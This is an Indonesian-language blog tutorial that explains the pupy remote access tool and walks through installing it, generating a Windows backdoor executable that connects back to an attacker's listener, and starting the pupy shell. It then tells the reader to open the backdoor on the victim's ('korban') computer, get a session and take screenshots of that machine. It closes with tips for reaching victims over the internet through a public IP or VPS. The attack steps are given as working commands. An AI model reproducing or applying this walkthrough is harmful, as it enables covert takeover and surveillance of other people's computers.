Apa itu pupy?
Menurut pengembang pupy yg bernama n1nj4sec dari repository githubnyaPupy adalah RAT (Remote Administration Tool jarak jauh) yang opensource, multi-platform (Windows, Linux, OSX, Android), multi fungsi dan alat pasca-eksploitasi terutama ditulis dalam pythonIntinya pupy digunakan untuk meremote komputer victim dari jarak jauh. Cara menggunakan pupy cukup mirip dengan metasploit, hanya saja syntax commandnya yang sedikit berbeda. Pupy dibuat menggunakan python yang memungkinkan tool ini dapat berjalan di semua OS (Windows, Linux ,OSX, Android)Maka dari itulah pupy sering disebut dengan julukan Mini Metasploit.
Instalasi
Pertama-tama tentu saja kita harus menginstall pupy terlebih dahulu.Proses instalasi cukup mudah. Jalankan command dibawah ini pada terminal:
git clone https://github.com/n1nj4sec/pupy.git pupy
cd pupy
git submodule update --init --depth 1 pupy/payload_templates
git submodule init
git submodule update
pip install -r requirements.txt
Tutorial
NOTE:Saya menggunakan jaringan lokal pada tutorial ini1.) Langkah pertama adalah dengan membuka terminal kemudian masuk ke directory pupy
cd /c/tools/rat/pupy/pupy/
su
./pupygen.py -f exe_x86 -o backdoor.exe connect –host 10.42.0.1:9999 -t tcp_cleartext
Parameter -f merupakan format yang akan kita gunakan , Anda bisa menggunakan format untuk Linux atau Android , namun pada kasus ini kita hanya ingin membuat backdoor win32 sederhana
Parameter -o merupakan nama output file yang akan dihasilkan ole pupy
Parameter connect untuk membuat backdoor tersambung ke server
Kemudian yang terakhir adalah parameterOutpunya seperti ini:tmerupakan trnsport layer yang akan kita gunakan, secara default pupy menggunakan trnsport ssl, namun Saya akan menggunakan layertcp_cleartextkarena layer tersebut dapat bekerja 100% untuk Saya.
4.) Pupy mempunyai listener sendiri seperti Metasploit yang bernama Pupy Shell, mari kita jalankan listener tersebut dengan menjalankan perintah dibawah ini
./pupysh.py -p 9999 -t tcp_cleartext
Parameter p adalah nomor port dimana pupy shell akan me-listen (Harus sama seperti transport layer yang digunakan pada backdoor)
Parameter t adalah transport layer yang kita gunakan (Harus sama seperti transport layer yang digunakan pada backdoor)
Output:
5.) Sekarang tugas Anda adalah membuka backdoor yang telah kita buat tadi pada komputer korban.
6.) Tunggu sampai Anda mendapatkan session seperti ini
Bingo , Kita dapat session!
7.) Sekarang terserah kita mau diapakan komputer korban, Anda bisa melihat daftar modul dengan menjalankan perintah
list_modules>>> list_modules
Anda bisa melihat bahwa banyak sekali modul yang tersedia pada pupy
8.) Jika kita ingin menjalankan salah satu dari modul tersebut, Anda hanya butuh mengetikkan
run kategori/module. Mari kita mengambil screenshot pada komputer korban dengan menjalankan perintah ini>>> run gather/screenshot
Anda bisa melihat bahwa screenshot berhasil diambil dan gambar screenshot tersimpan di folder screenshot
NOTE:
Anda bisa menggunakan Pupy diluar jaringan dengan membuat backdoor yang hostnya mengarah pada IP publik Anda (harus terforward terlebih dahulu), atau IP dari VPS Anda.
Source : https://dytracode.blogspot.co.id/2016/11/tutorial-membuat-backdoor-menggunakan.html
mantapp gan infonya
BalasHapussolder uap 2in1